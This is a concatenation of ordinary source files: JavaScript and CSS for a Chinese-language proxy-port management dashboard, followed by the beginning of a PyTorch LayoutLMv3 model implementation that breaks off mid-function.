const noAuth = document.getElementById('port-no-auth-user').checked;
// 如果选择了"无需认证"但未填写用户名,则提示错误
if (noAuth && !username.trim()) {
alert('即使是无需认证的用户,也需要设置一个用户名作为标识');
return;
}
// 如果未选择"无需认证",但未填写密码,则提示错误
if (!noAuth && !password.trim()) {
alert('请输入用户密码');
return;
}
fetch(`/api/proxy/ports/${portId}/users`, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
username: username,
password: noAuth ? "" : password,
no_auth: noAuth
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
// 清空表单
document.getElementById('port-new-username').value = '';
document.getElementById('port-new-password').value = '';
document.getElementById('port-no-auth-user').checked = false;
// 刷新用户列表
loadPortUsers(portId);
alert('用户已添加');
} else {
alert('添加用户失败: ' + data.message);
}
})
.catch(error => {
console.error('添加用户请求失败:', error);
alert('添加用户请求失败,请稍后重试');
});
});
// 处理保存基本设置按钮点击
document.getElementById('save-port-basic').addEventListener('click', function() {
const portId = document.getElementById('port-id').value;
const listenAddr = document.getElementById('edit-port-addr').value;
const enabled = document.getElementById('edit-port-enabled').checked;
const allowAnonymous = document.getElementById('edit-port-anonymous').checked;
// 验证监听地址
if (!listenAddr.trim()) {
alert('监听地址不能为空');
return;
}
fetch(`/api/proxy/ports/${portId}`, {
method: 'PUT',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
listen_addr: listenAddr,
enabled: enabled,
allow_anonymous: allowAnonymous
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
alert('基本设置已保存');
// 刷新端口列表
loadProxyPorts();
} else {
alert('更新代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('更新代理端口请求失败:', error);
alert('更新代理端口请求失败,请稍后重试');
});
});
// 处理保存转发设置按钮点击
document.getElementById('save-port-forward').addEventListener('click', function() {
const portId = document.getElementById('port-id-forward').value;
const useForwardProxy = document.getElementById('port-use-forward-proxy').checked;
const remoteProxyAddr = document.getElementById('port-remote-proxy-addr').value;
const remoteProxyUser = document.getElementById('port-remote-proxy-user').value;
const remoteProxyPass = document.getElementById('port-remote-proxy-pass').value;
console.log("保存转发设置:", {
portId,
useForwardProxy,
remoteProxyAddr,
remoteProxyUser,
remoteProxyPass: remoteProxyPass ? "已设置" : "未设置"
});
// 如果启用转发代理但未填写代理地址,显示提示
if (useForwardProxy && !remoteProxyAddr) {
alert('启用代理转发时,远程代理地址不能为空');
return;
}
fetch(`/api/proxy/ports/${portId}/forward`, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
use_forward_proxy: useForwardProxy,
remote_proxy_addr: remoteProxyAddr,
remote_proxy_user: remoteProxyUser,
remote_proxy_pass: remoteProxyPass
})
})
.then(response => {
console.log("响应状态:", response.status);
return response.json();
})
.then(data => {
console.log("响应数据:", data);
if (data.success) {
if (data.data && data.data.restarted) {
alert('代理转发设置已保存,代理服务已重启以应用新设置');
} else {
alert('代理转发设置已保存');
}
// 刷新端口列表以显示最新状态
loadProxyPorts();
} else {
alert('更新代理转发设置失败: ' + data.message);
}
})
.catch(error => {
console.error('更新代理转发设置请求失败:', error);
alert('更新代理转发设置请求失败,请稍后重试');
});
});
// 监听无需认证复选框变化
document.getElementById('port-no-auth-user').addEventListener('change', function() {
const passwordInput = document.getElementById('port-new-password');
if (this.checked) {
passwordInput.disabled = true;
passwordInput.required = false;
passwordInput.value = '';
} else {
passwordInput.disabled = false;
passwordInput.required = true;
}
});
// 加载端口专用用户
loadPortUsers(port.id);
// 加载端口代理转发设置
loadPortForwardSettings(port.id);
}
// 加载端口代理转发设置
function loadPortForwardSettings(portId) {
fetch(`/api/proxy/ports/${portId}/forward`, {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const settings = data.data;
// 更新表单字段
document.getElementById('port-use-forward-proxy').checked = settings.use_forward_proxy;
if (settings.remote_proxy_addr) {
document.getElementById('port-remote-proxy-addr').value = settings.remote_proxy_addr;
}
if (settings.remote_proxy_user) {
document.getElementById('port-remote-proxy-user').value = settings.remote_proxy_user;
}
// 更新转发设置区域的显示状态
const forwardSettings = document.getElementById('port-forward-settings');
if (settings.use_forward_proxy) {
forwardSettings.classList.remove('disabled');
} else {
forwardSettings.classList.add('disabled');
}
}
})
.catch(error => {
console.error('获取端口代理转发设置失败:', error);
});
}
// 加载端口专用用户
function loadPortUsers(portId) {
fetch(`/api/proxy/ports/${portId}/users`, {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const usersList = document.getElementById('port-users-list');
usersList.innerHTML = '';
if (data.data.length === 0) {
const row = document.createElement('tr');
const cell = document.createElement('td');
cell.colSpan = 3;
cell.style.textAlign = 'center';
cell.textContent = '暂无专用用户';
row.appendChild(cell);
usersList.appendChild(row);
} else {
data.data.forEach(user => {
const row = document.createElement('tr');
const usernameCell = document.createElement('td');
usernameCell.textContent = user.username;
const passwordCell = document.createElement('td');
passwordCell.textContent = user.no_auth ? '无需密码' : '******';
const actionCell = document.createElement('td');
const deleteBtn = document.createElement('button');
deleteBtn.textContent = '删除';
deleteBtn.className = 'btn-delete';
deleteBtn.addEventListener('click', function() {
deletePortUser(portId, user.username);
});
actionCell.appendChild(deleteBtn);
row.appendChild(usernameCell);
row.appendChild(passwordCell);
row.appendChild(actionCell);
usersList.appendChild(row);
});
}
}
})
.catch(error => {
console.error('获取端口用户列表失败:', error);
});
}
// 删除端口专用用户
function deletePortUser(portId, username) {
if (confirm(`确定要删除用户 "${username}" 吗?`)) {
fetch(`/api/proxy/ports/${portId}/users/${username}`, {
method: 'DELETE',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadPortUsers(portId);
alert('用户已删除');
} else {
alert('删除用户失败: ' + data.message);
}
})
.catch(error => {
console.error('删除用户请求失败:', error);
alert('删除用户请求失败,请稍后重试');
});
}
}
// 删除代理端口
function deleteProxyPort(id) {
if (confirm('确定要删除此代理端口吗?')) {
fetch(`/api/proxy/ports/${id}`, {
method: 'DELETE',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadProxyPorts();
} else {
alert('删除代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('删除代理端口请求失败:', error);
alert('删除代理端口请求失败,请稍后重试');
});
}
}
}); |
2833844911/cyTlsXhr | 10,733 | static/css/style.css | /* 全局样式 */
* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Microsoft YaHei', Arial, sans-serif;
}
body {
    background-color: #f5f5f5;
    color: #333;
    line-height: 1.6;
}
/* Login page */
.login-container {
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #f0f2f5;
}
.login-box {
    background-color: #fff;
    border-radius: 8px;
    box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
    padding: 30px;
    width: 380px;
}
.login-box h2 {
    text-align: center;
    margin-bottom: 24px;
    color: #1890ff;
}
.form-group {
    margin-bottom: 20px;
}
.form-group label {
    display: block;
    margin-bottom: 8px;
    font-weight: 500;
}
.form-group input {
    width: 100%;
    padding: 10px 12px;
    border: 1px solid #d9d9d9;
    border-radius: 4px;
    font-size: 14px;
    transition: all 0.3s;
}
.form-group input:focus {
    border-color: #1890ff;
    box-shadow: 0 0 0 2px rgba(24, 144, 255, 0.2);
    outline: none;
}
.btn-login {
    width: 100%;
    padding: 10px 12px;
    background-color: #1890ff;
    color: white;
    border: none;
    border-radius: 4px;
    font-size: 16px;
    cursor: pointer;
    transition: background-color 0.3s;
}
.btn-login:hover {
    background-color: #40a9ff;
}
.error-message {
    color: #f5222d;
    margin-bottom: 16px;
    text-align: center;
    min-height: 20px;
}
/* Dashboard layout */
.dashboard-container {
    display: flex;
    flex-direction: column;
    min-height: 100vh;
}
.dashboard-header {
    background-color: #001529;
    color: white;
    padding: 0 20px;
    height: 64px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1);
}
.dashboard-header h1 {
    font-size: 20px;
    margin: 0;
}
.user-info {
    display: flex;
    align-items: center;
}
.user-info span {
    margin-right: 16px;
}
.btn-logout {
    background-color: transparent;
    border: 1px solid rgba(255, 255, 255, 0.5);
    color: white;
    padding: 4px 12px;
    border-radius: 4px;
    cursor: pointer;
    transition: all 0.3s;
}
.btn-logout:hover {
    background-color: rgba(255, 255, 255, 0.1);
}
.dashboard-content {
    display: flex;
    flex: 1;
}
.sidebar {
    width: 200px;
    background-color: #001529;
    color: white;
    padding-top: 20px;
}
.nav-menu {
    list-style: none;
}
.nav-menu li {
    padding: 12px 20px;
    cursor: pointer;
    transition: background-color 0.3s;
}
.nav-menu li:hover {
    background-color: #1890ff;
}
.nav-menu li.active {
    background-color: #1890ff;
    font-weight: 500;
}
.main-content {
    flex: 1;
    padding: 20px;
    background-color: #f0f2f5;
}
.panel {
    display: none;
    background-color: white;
    border-radius: 8px;
    box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
    padding: 20px;
    margin-bottom: 20px;
}
.panel.active {
    display: block;
}
.panel h2 {
    margin-bottom: 20px;
    color: #1890ff;
    border-bottom: 1px solid #f0f0f0;
    padding-bottom: 10px;
}
/* Status card */
.status-card {
    background-color: white;
    border-radius: 8px;
    padding: 20px;
}
.status-item {
    display: flex;
    margin-bottom: 16px;
    align-items: center;
}
.status-item .label {
    width: 120px;
    font-weight: 500;
}
.status-indicator {
    padding: 4px 8px;
    border-radius: 4px;
    font-size: 14px;
}
.status-indicator.running {
    background-color: #52c41a;
    color: white;
}
.status-indicator.stopped {
    background-color: #f5222d;
    color: white;
}
.status-actions {
    margin-top: 20px;
    display: flex;
    gap: 10px;
}
.btn-action {
    padding: 8px 16px;
    border-radius: 4px;
    cursor: pointer;
    border: none;
    transition: all 0.3s;
}
#start-proxy {
    background-color: #52c41a;
    color: white;
}
#start-proxy:hover {
    background-color: #73d13d;
}
#stop-proxy {
    background-color: #f5222d;
    color: white;
}
#stop-proxy:hover {
    background-color: #ff4d4f;
}
#stop-proxy:disabled {
    background-color: #d9d9d9;
    cursor: not-allowed;
}
/* User management */
.user-list-container {
    display: flex;
    gap: 20px;
}
.user-table {
    flex: 2;
    border-collapse: collapse;
    width: 100%;
}
.user-table th, .user-table td {
    border: 1px solid #f0f0f0;
    padding: 12px;
    text-align: left;
}
.user-table th {
    background-color: #fafafa;
    font-weight: 500;
}
.user-table tr:hover {
    background-color: #f5f5f5;
}
.add-user-form {
    flex: 1;
    background-color: #fafafa;
    padding: 20px;
    border-radius: 8px;
}
.add-user-form h3 {
    margin-bottom: 16px;
    color: #1890ff;
}
.btn-add {
    background-color: #1890ff;
    color: white;
    border: none;
    padding: 8px 16px;
    border-radius: 4px;
    cursor: pointer;
    transition: background-color 0.3s;
}
.btn-add:hover {
    background-color: #40a9ff;
}
.btn-delete {
    background-color: #f5222d;
    color: white;
    border: none;
    padding: 4px 8px;
    border-radius: 4px;
    cursor: pointer;
    transition: background-color 0.3s;
}
.btn-delete:hover {
    background-color: #ff4d4f;
}
/* Settings panel */
.settings-form {
    max-width: 500px;
}
.btn-save {
    background-color: #1890ff;
    color: white;
    border: none;
    padding: 8px 16px;
    border-radius: 4px;
    cursor: pointer;
    transition: background-color 0.3s;
    margin-top: 10px;
}
.btn-save:hover {
    background-color: #40a9ff;
}
/* Statistics panel */
.stats-summary {
    display: flex;
    flex-direction: column;
    gap: 20px;
}
.stats-card {
    background-color: white;
    border-radius: 8px;
    padding: 20px;
    box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
}
.stats-card h3 {
    margin-bottom: 16px;
    color: #1890ff;
}
.stats-value {
    font-size: 32px;
    font-weight: bold;
    color: #1890ff;
}
.stats-table {
    width: 100%;
    border-collapse: collapse;
}
.stats-table th, .stats-table td {
    border: 1px solid #f0f0f0;
    padding: 12px;
    text-align: left;
}
.stats-table th {
    background-color: #fafafa;
    font-weight: 500;
}
.stats-table-container {
    max-height: 300px;
    overflow-y: auto;
}
.btn-reset {
    background-color: #faad14;
    color: white;
    border: none;
    padding: 8px 16px;
    border-radius: 4px;
    cursor: pointer;
    transition: background-color 0.3s;
    align-self: flex-start;
}
.btn-reset:hover {
    background-color: #ffc53d;
}
/* Checkbox groups */
.checkbox-group {
    display: flex;
    align-items: center;
    margin-bottom: 15px;
}
.checkbox-group input[type="checkbox"] {
    margin-right: 10px;
    width: auto;
    height: auto;
}
.checkbox-group label {
    margin: 0;
    font-weight: normal;
}
/* Multi-port management */
.ports-container {
    display: flex;
    flex-direction: column;
    gap: 20px;
}
.ports-list-container {
    background-color: white;
    border-radius: 8px;
    box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
    padding: 20px;
    overflow: auto;
}
.ports-table {
    width: 100%;
    border-collapse: collapse;
}
.ports-table th, .ports-table td {
    border: 1px solid #f0f0f0;
    padding: 12px;
    text-align: left;
}
.ports-table th {
    background-color: #fafafa;
    font-weight: 500;
}
.ports-table tr:hover {
    background-color: #f5f5f5;
}
.port-actions {
    display: flex;
    gap: 5px;
}
.btn-start {
    background-color: #52c41a;
    color: white;
    border: none;
    padding: 4px 8px;
    border-radius: 4px;
    cursor: pointer;
    transition: background-color 0.3s;
}
.btn-start:hover {
    background-color: #73d13d;
}
.btn-start:disabled {
    background-color: #d9d9d9;
    cursor: not-allowed;
}
.btn-stop {
    background-color: #f5222d;
    color: white;
    border: none;
    padding: 4px 8px;
    border-radius: 4px;
    cursor: pointer;
    transition: background-color 0.3s;
}
.btn-stop:hover {
    background-color: #ff4d4f;
}
.btn-edit {
    background-color: #1890ff;
    color: white;
    border: none;
    padding: 4px 8px;
    border-radius: 4px;
    cursor: pointer;
    transition: background-color 0.3s;
}
.btn-edit:hover {
    background-color: #40a9ff;
}
.add-port-form {
    background-color: white;
    border-radius: 8px;
    box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
    padding: 20px;
}
.add-port-form h3 {
    margin-bottom: 16px;
    color: #1890ff;
    border-bottom: 1px solid #f0f0f0;
    padding-bottom: 10px;
}
/* Modal dialogs */
.modal-overlay {
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    background-color: rgba(0, 0, 0, 0.5);
    display: flex;
    justify-content: center;
    align-items: center;
    z-index: 1000;
}
.modal-content {
    background-color: white;
    border-radius: 8px;
    box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
    padding: 24px;
    width: 500px;
    max-width: 90%;
}
.modal-content h3 {
    margin-bottom: 16px;
    color: #1890ff;
    border-bottom: 1px solid #f0f0f0;
    padding-bottom: 10px;
}
.modal-actions {
    display: flex;
    justify-content: flex-end;
    gap: 10px;
    margin-top: 20px;
}
.btn-cancel {
    background-color: #f5f5f5;
    color: #333;
    border: 1px solid #d9d9d9;
    padding: 8px 16px;
    border-radius: 4px;
    cursor: pointer;
    transition: all 0.3s;
}
.btn-cancel:hover {
    background-color: #e8e8e8;
}
/* Port detail modal */
.port-detail-modal .modal-content {
    width: 700px;
}
.port-detail-tabs {
    display: flex;
    border-bottom: 1px solid #f0f0f0;
    margin-bottom: 20px;
}
.port-detail-tab {
    padding: 10px 20px;
    cursor: pointer;
    border-bottom: 2px solid transparent;
    transition: all 0.3s;
}
.port-detail-tab.active {
    color: #1890ff;
    border-bottom-color: #1890ff;
}
.port-detail-panel {
    display: none;
}
.port-detail-panel.active {
    display: block;
}
.port-info {
    margin-bottom: 20px;
}
.port-info-item {
    display: flex;
    margin-bottom: 10px;
}
.port-info-label {
    width: 120px;
    font-weight: 500;
    color: #666;
}
.port-info-value {
    flex: 1;
}
/* Port user table */
.port-users-table {
    width: 100%;
    border-collapse: collapse;
    margin-bottom: 15px;
}
.port-users-table th, .port-users-table td {
    border: 1px solid #f0f0f0;
    padding: 10px;
    text-align: left;
}
.port-users-table th {
    background-color: #fafafa;
}
/* Proxy forward settings */
.proxy-forward-settings {
    background-color: #f9f9f9;
    border-radius: 6px;
    padding: 15px;
    margin-top: 15px;
}
/* NOTE(review): the port-detail modal toggles class "disabled" on an element
   with id #port-forward-settings that does not carry the
   .proxy-forward-settings class, so this compound selector may never match
   there — verify against the generated markup. */
.proxy-forward-settings.disabled {
    opacity: 0.7;
    pointer-events: none;
}
/* Form hint text */
.form-hint {
    font-size: 0.8em;
    color: #ff6b6b;
    margin-top: 5px;
    margin-bottom: 0;
}
/* Disabled form elements */
input:disabled {
    background-color: #f5f5f5;
    cursor: not-allowed;
}
27182812/ChatGLM-LLaMA-chinese-insturct | 61,217 | src/transformers/models/layoutlmv3/modeling_layoutlmv3.py | # coding=utf-8
# Copyright 2022 Microsoft Research and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch LayoutLMv3 model."""
import collections
import math
from typing import Optional, Tuple, Union
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.checkpoint
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ...activations import ACT2FN
from ...modeling_outputs import (
BaseModelOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import apply_chunking_to_forward
from ...utils import add_start_docstrings, add_start_docstrings_to_model_forward, logging, replace_return_docstrings
from .configuration_layoutlmv3 import LayoutLMv3Config
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "LayoutLMv3Config"
LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST = [
"microsoft/layoutlmv3-base",
"microsoft/layoutlmv3-large",
# See all LayoutLMv3 models at https://huggingface.co/models?filter=layoutlmv3
]
LAYOUTLMV3_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class. Use
it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`LayoutLMv3Config`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
LAYOUTLMV3_MODEL_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
bbox (`torch.LongTensor` of shape `({0}, 4)`, *optional*):
Bounding boxes of each input sequence tokens. Selected in the range `[0,
config.max_2d_position_embeddings-1]`. Each bounding box should be a normalized version in (x0, y0, x1, y1)
format, where (x0, y0) corresponds to the position of the upper left corner in the bounding box, and (x1,
y1) represents the position of the lower right corner.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Batch of document images. Each image is divided into patches of shape `(num_channels, config.patch_size,
config.patch_size)` and the total number of patches (=`patch_sequence_length`) equals to `((height /
config.patch_size) * (width / config.patch_size))`.
attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are position IDs?](../glossary#position-ids)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert *input_ids* indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
LAYOUTLMV3_DOWNSTREAM_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
bbox (`torch.LongTensor` of shape `({0}, 4)`, *optional*):
Bounding boxes of each input sequence tokens. Selected in the range `[0,
config.max_2d_position_embeddings-1]`. Each bounding box should be a normalized version in (x0, y0, x1, y1)
format, where (x0, y0) corresponds to the position of the upper left corner in the bounding box, and (x1,
y1) represents the position of the lower right corner.
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Batch of document images. Each image is divided into patches of shape `(num_channels, config.patch_size,
config.patch_size)` and the total number of patches (=`patch_sequence_length`) equals to `((height /
config.patch_size) * (width / config.patch_size))`.
attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert *input_ids* indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
class LayoutLMv3PatchEmbeddings(nn.Module):
    """Turn a pixel grid into a sequence of patch embeddings.

    A single strided convolution projects each non-overlapping patch to
    ``hidden_size`` channels. When a position-embedding table is supplied, it
    is resized with bicubic interpolation so that inputs larger than the
    pre-training resolution still line up with the patch grid.
    """

    def __init__(self, config):
        super().__init__()

        def _to_pair(value):
            # Accept either a single int or an (height, width) iterable.
            return value if isinstance(value, collections.abc.Iterable) else (value, value)

        image_size = _to_pair(config.input_size)
        patch_size = _to_pair(config.patch_size)
        # Number of patches along (height, width) at the pre-training resolution.
        self.patch_shape = (image_size[0] // patch_size[0], image_size[1] // patch_size[1])
        self.proj = nn.Conv2d(config.num_channels, config.hidden_size, kernel_size=patch_size, stride=patch_size)

    def forward(self, pixel_values, position_embedding=None):
        patches = self.proj(pixel_values)
        if position_embedding is not None:
            # Reshape the flat position table to its 2-D grid, resize it to the
            # actual patch grid of this input, then add it channel-wise.
            grid = position_embedding.view(1, self.patch_shape[0], self.patch_shape[1], -1)
            grid = grid.permute(0, 3, 1, 2)
            height, width = patches.shape[2], patches.shape[3]
            patches = patches + F.interpolate(grid, size=(height, width), mode="bicubic")
        # (batch, hidden, h, w) -> (batch, h * w, hidden)
        return patches.flatten(2).transpose(1, 2)
class LayoutLMv3TextEmbeddings(nn.Module):
    """
    LayoutLMv3 text embeddings. Same as `RobertaEmbeddings` but with added spatial (layout) embeddings.

    The final embedding of a token is the sum of its word, token-type, 1D-position and
    2D (bounding-box) embeddings, followed by LayerNorm and dropout.
    """
    def __init__(self, config):
        super().__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
        self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        # position_ids (1, len position emb) is contiguous in memory and exported when serialized
        self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
        self.padding_idx = config.pad_token_id
        self.position_embeddings = nn.Embedding(
            config.max_position_embeddings, config.hidden_size, padding_idx=self.padding_idx
        )
        # Layout embeddings: x/y coordinate tables plus box height/width tables.
        self.x_position_embeddings = nn.Embedding(config.max_2d_position_embeddings, config.coordinate_size)
        self.y_position_embeddings = nn.Embedding(config.max_2d_position_embeddings, config.coordinate_size)
        self.h_position_embeddings = nn.Embedding(config.max_2d_position_embeddings, config.shape_size)
        self.w_position_embeddings = nn.Embedding(config.max_2d_position_embeddings, config.shape_size)
    def calculate_spatial_position_embeddings(self, bbox):
        """
        Embed each (x0, y0, x1, y1) bounding box. Coordinates index the x/y tables
        directly, so they must lie in the 0-1000 range; height/width are clipped to
        the table size before lookup.
        """
        try:
            left_position_embeddings = self.x_position_embeddings(bbox[:, :, 0])
            upper_position_embeddings = self.y_position_embeddings(bbox[:, :, 1])
            right_position_embeddings = self.x_position_embeddings(bbox[:, :, 2])
            lower_position_embeddings = self.y_position_embeddings(bbox[:, :, 3])
        except IndexError as e:
            raise IndexError("The `bbox` coordinate values should be within 0-1000 range.") from e
        h_position_embeddings = self.h_position_embeddings(torch.clip(bbox[:, :, 3] - bbox[:, :, 1], 0, 1023))
        w_position_embeddings = self.w_position_embeddings(torch.clip(bbox[:, :, 2] - bbox[:, :, 0], 0, 1023))
        # below is the difference between LayoutLMEmbeddingsV2 (torch.cat) and LayoutLMEmbeddingsV1 (add)
        spatial_position_embeddings = torch.cat(
            [
                left_position_embeddings,
                upper_position_embeddings,
                right_position_embeddings,
                lower_position_embeddings,
                h_position_embeddings,
                w_position_embeddings,
            ],
            dim=-1,
        )
        return spatial_position_embeddings
    def create_position_ids_from_input_ids(self, input_ids, padding_idx):
        """
        Replace non-padding symbols with their position numbers. Position numbers begin at padding_idx+1. Padding
        symbols are ignored. This is modified from fairseq's `utils.make_positions`.
        """
        # The series of casts and type-conversions here are carefully balanced to both work with ONNX export and XLA.
        mask = input_ids.ne(padding_idx).int()
        incremental_indices = (torch.cumsum(mask, dim=1).type_as(mask)) * mask
        return incremental_indices.long() + padding_idx
    def create_position_ids_from_inputs_embeds(self, inputs_embeds):
        """
        We are provided embeddings directly. We cannot infer which are padded so just generate sequential position ids.
        """
        input_shape = inputs_embeds.size()[:-1]
        sequence_length = input_shape[1]
        position_ids = torch.arange(
            self.padding_idx + 1, sequence_length + self.padding_idx + 1, dtype=torch.long, device=inputs_embeds.device
        )
        return position_ids.unsqueeze(0).expand(input_shape)
    def forward(
        self,
        input_ids=None,
        bbox=None,
        token_type_ids=None,
        position_ids=None,
        inputs_embeds=None,
    ):
        """Sum word, token-type, 1D-position and layout embeddings, then normalize and drop out."""
        if position_ids is None:
            if input_ids is not None:
                # Create the position ids from the input token ids. Any padded tokens remain padded.
                position_ids = self.create_position_ids_from_input_ids(input_ids, self.padding_idx).to(
                    input_ids.device
                )
            else:
                position_ids = self.create_position_ids_from_inputs_embeds(inputs_embeds)
        if input_ids is not None:
            input_shape = input_ids.size()
        else:
            input_shape = inputs_embeds.size()[:-1]
        if token_type_ids is None:
            token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
        if inputs_embeds is None:
            inputs_embeds = self.word_embeddings(input_ids)
        token_type_embeddings = self.token_type_embeddings(token_type_ids)
        embeddings = inputs_embeds + token_type_embeddings
        position_embeddings = self.position_embeddings(position_ids)
        embeddings += position_embeddings
